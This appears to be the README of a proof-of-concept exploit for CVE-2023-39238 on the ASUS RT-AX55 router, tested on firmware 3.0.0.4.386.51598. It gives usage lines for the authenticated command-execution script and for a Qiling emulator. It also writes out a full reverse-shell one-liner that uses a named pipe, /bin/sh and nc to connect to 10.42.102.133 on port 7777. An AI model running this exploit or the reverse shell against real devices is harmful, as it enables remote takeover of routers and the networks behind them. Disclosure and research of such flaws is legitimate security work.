CVE-2023-39238

Exploit

usage: exploit.py [-h] --url URL --credentials CREDENTIALS --cmd CMD

The exploit requires authentication. Read the full blogpost.

The code was tested against the following firmware version:

  • ASUS RT-AX55 Firmware version 3.0.0.4.386.51598

Different firmware versions or daemons may place the SystemCmd global variable at a different offset; adjust the script accordingly.

The PoC script executes commands and reports their output using other authenticated endpoints. However, a reverse shell can be obtained by executing the following: rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.42.102.133 7777 > /tmp/f

Emulator

Qiling>=1.4.7 is required.

usage: emulate.py